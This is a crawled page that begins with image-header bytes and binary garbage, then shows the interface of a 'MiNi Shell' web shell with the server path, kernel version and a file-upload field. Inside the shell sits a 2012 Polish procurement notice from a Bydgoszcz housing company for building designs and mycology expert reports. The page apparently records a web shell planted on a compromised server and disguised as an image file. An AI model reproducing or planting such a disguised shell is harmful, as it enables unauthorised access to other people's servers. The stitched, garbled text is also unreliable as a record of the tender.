JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120726/271078-N-2012.html

<p class="kh_header"><b>Bydgoszcz: 54/P/2012</b><br>
<b>Numer ogłoszenia: 271078 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Domów Miejskich "ADM" Spółka z o.o. , ul. Śniadeckich 1, 85-011 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3481600, faks 052 3481607.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.adm.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 54/P/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dla budynków  przy ul. Kaplicznej 2, Bernardyńskiej  3, Kościuszki 42bl.1 oraz ekspertyz  mykologicznych  dla budynków  przy ul. Kiedrowskiego 2 i Toruńskiej 20 ( budynek użytkowy) - zarządzanych przez Administrację Domów Miejskich ADM Sp. z o.o. w Bydgoszczy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  posiadania wiedzy i doświadczenia zostanie spełniony jeśli Wykonawca wykaże, iż w okresie  ostatnich 3 lat przed  dniem wszczęcia  postępowania  o udzielenie  zamówienia , a jeżeli okres  prowadzenia działalności jest krótszy -  w tym okresie - zrealizował  należycie  (dla każdego zadania), zamówienia odpowiadające swoim rodzajem usługom stanowiącym przedmiot  niniejszego zamówienia  tj. wykonał  co najmniej: 
a)dla  zadania  nr 1 - 1  projekt  budowlany  dotyczący  wzmocnienia/zmian  elementów konstrukcyjnych  budynku , 
b)dla  zadania  nr 2  -   1 projekt budowlany dotyczący odprowadzenia  wód gruntowych 
c)dla  zadania  nr 3 - 1 projekt  budowlany  w zakresie wzmocnienia/zmian elementów  konstrukcyjnych budynku
d)dla  zadania  nr 4   -   1 ekspertyzę mykologiczno - budowlaną  budynku  mieszkalnego  lub użytkowego wraz z analizą  ekonomiczną  opłacalności  ewentualnego remontu. 
e)dla  zadania  nr 5  - 1 ekspertyzę mykologiczno - budowlaną  budynku  mieszkalnego  lub użytkowego wraz z analizą  ekonomiczną  opłacalności  ewentualnego remontu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia   zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje co najmniej (dla każdego zadania) :
a) dla zadania 1 - jedną osobą  posiadającą uprawnienia budowlane do projektowania  w specjalności architektonicznej  lub konstrukcyjno- budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U.  z 2010r., Nr 243, poz. 1623 tekst jednolity ) lub odpowiadające  im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa.
b) dla zadania 2 - jedną osobą posiadającą uprawnienia budowlane do projektowania  w specjalności  instalacyjnej  w zakresie  sieci, instalacji wodociągowych  i kanalizacyjnych  - zgodnie  z ustawą  z dnia 7 lipca 1994 Prawo budowlane (Dz. U. z 2010r., Nr 243, poz. 1623 tekst jednolity) lub odpowiadające  im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa.
c) dla zadania 3 - jedną osobą  posiadającą uprawnienia budowlane  do projektowania w specjalności architektonicznej  lub konstrukcyjno- budowlanej , zgodnie  z ustawą  z dnia 7 lipca  1994 Prawo budowlane  (Dz. U.  z 2010r., Nr 243, poz. 1623 tekst jednolity ) lub odpowiadające im  uprawnienia  wydane  na podstawie  wcześniej  obowiązujących  przepisów prawa.
d)  dla  zadania 4   - jedną osobą  posiadającą  tytuł rzeczoznawcy budowlanego z uprawnieniami w specjalności architektonicznej  lub konstrukcyjno-budowlanej  zarejestrowaną w Centralnym Rejestrze  Rzeczoznawców Budowlanych (art. 15 Prawo budowlane  -Dz. U.  z 2010r., Nr 243, poz. 1623 tekst jednolity ), która jednocześnie  ukończyła  z wynikiem pozytywnym  specjalistyczny kurs ( szkolenie ) w zakresie  mykologii budowlanej, 
e)   dla  zadania 5  - jedną osobą  posiadającą  tytuł rzeczoznawcy budowlanego z uprawnieniami w specjalności architektonicznej  lub konstrukcyjno-budowlanej  zarejestrowaną w Centralnym Rejestrze  Rzeczoznawców Budowlanych (art. 15 Prawo budowlane  -Dz. U.  z 2010r., Nr 243, poz. 1623 tekst jednolity ) , która jednocześnie  ukończyła  z wynikiem pozytywnym  specjalistyczny kurs ( szkolenie ) w zakresie mykologii budowlanej,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Ofertę złożoną  wg Formularza Ofertowego . Treść  oferty powinna odpowiadać  merytorycznej  zawartości załącznika  nr 1 do SIWZ .    
2. w przypadku jeżeli Wykonawca w celu wykazania spełniania warunków udziału        w postępowaniu  polega na zasobach innych podmiotów - pisemne zobowiązanie (wyłącznie w formie ORYGINAŁU)  innych podmiotów do oddania do dyspozycji zasobów niezbędnych do realizacji zamówienia, na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z dyspozycją wynikającą z treści art.26 ust. 2b)  ustawy Prawo Zamówień Publicznych .  
3. w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo,  o którym mowa w pkt. 7.9 ust 1.  niniejszej  SIWZ
4. w przypadku składania oferty przez pełnomocnika Wykonawcy - pełnomocnictwo    do reprezentowania wykonawcy przez  Pełnomocnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z  art. 144 ustawy Pzp  Zamawiający przewiduje  możliwość  zmiany umowy w zakresie   i  przypadkach niżej określonych:  
1.  Wynagrodzenie należne wykonawcy  podlega  automatycznej  zmianie do zmiany wysokości podatku VAT  obowiązującej  w chwili  powstania  obowiązku podatkowego. W takim przypadku wysokość  wynagrodzenia  należnego  wykonawcy ustalana jest  każdorazowo z  uwzględnieniem  aktualnej  stawki podatku VAT obowiązującej  na dzień  wystawienia  faktury ( powstania  obowiązku podatkowego). W takich przypadkach zmiana  wynagrodzenia  należnego wykonawcy nie wymaga  złożenia  dodatkowego zgodnego oświadczenia  woli stron o ustaleniu tego wynagrodzenia w nowej wysokości , tj. nie jest  wymagane zawarcie aneksu do umowy. 
2. Zmiany terminu wykonania zamówienia w przypadku konieczności wydłużenia terminu realizacji umowy wywołanej ważnymi zdarzeniami niemożliwymi do przewidzenia w chwili podpisania umowy, o czas  nie dłuższy niż okres trwania przeszkód w realizacji umowy wynikających z ww. zdarzeń. W takim przypadku zmiana dokonuje się po pisemnym powiadomieniu Zamawiającego przez Wykonawcę o ich zaistnieniu - jednak nie później niż w dniu określonym w umowie na dzień zakończenia realizacji zamówienia  i  potwierdzeniu tych okoliczności przez Zamawiającego w formie spisanego na tę okoliczność  protokołu konieczności i zaakceptowanego przez strony. Zmiana terminu nastąpi  w drodze aneksu do umowy.
3.  W przypadku wystąpienia  okoliczności stanowiących podstawę  do zmian  postanowień umowy Wykonawca zobowiązany jest do niezwłocznego, jednak  nie później niż przed upływem terminu zakończenia realizacji zamówienia -  poinformowania  o tym  fakcie  Zamawiającego i  wystąpienia o  dokonanie  zmian   w przedmiotowej  umowie .
4.  Jeżeli  Zamawiający uzna ,że zaistniałe okoliczności stanowiące podstawę  do zmiany w umowie  nie są  zasadne, Wykonawca zobowiązany jest do realizacji zadania  zgodnie  z warunkami zawartymi w SIWZ  i  umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.adm.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Domów Miejskich  ADM Sp. z o.o.  Dział Zamówień Publicznych  , 85-005 Bydgoszcz  ul. Gdańska 9 - 2 piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 10:00, miejsce: Administracja Domów Miejskich  ADM Sp. z o.o.  Dział Zamówień Publicznych  85-005 Bydgoszcz  ul. Gdańska 9 - 2 piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 54/P/2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie projektu budowlanego  dla budynku mieszkalnego  przy ul. Kaplicznej 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 54/P/2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie  projektu budowlanego na odprowadzenie  wód gruntowych  w kierunku  ul. Bernardyńskiej dla budynku przy ul. Bernardyńska 3 za pomocą drenażu opaskowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 54/P/2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie  projektu budowlanego budynku mieszkalnego -oficyny przy ul. Kościuszki  42bl.1 - w zakresie wzmocnienia  elementów drewnianych  galerii budynku..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 54/P/2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opracowanie  ekspertyzy  mykologicznej   dla lokalu nr 2  w budynku przy ul. Kiedrowskiego 2 w zakresie zawilgocenia  ścian i powstawanie grzyba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 54/P/2012.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  ekspertyzy mykologiczno-budowlanej  wraz z analizą  ekonomiczną  oplacalności  ewentualnego remontu budynku przy ul. Toruńskiej 20( budynek użytkowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.30.00.00-1, 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com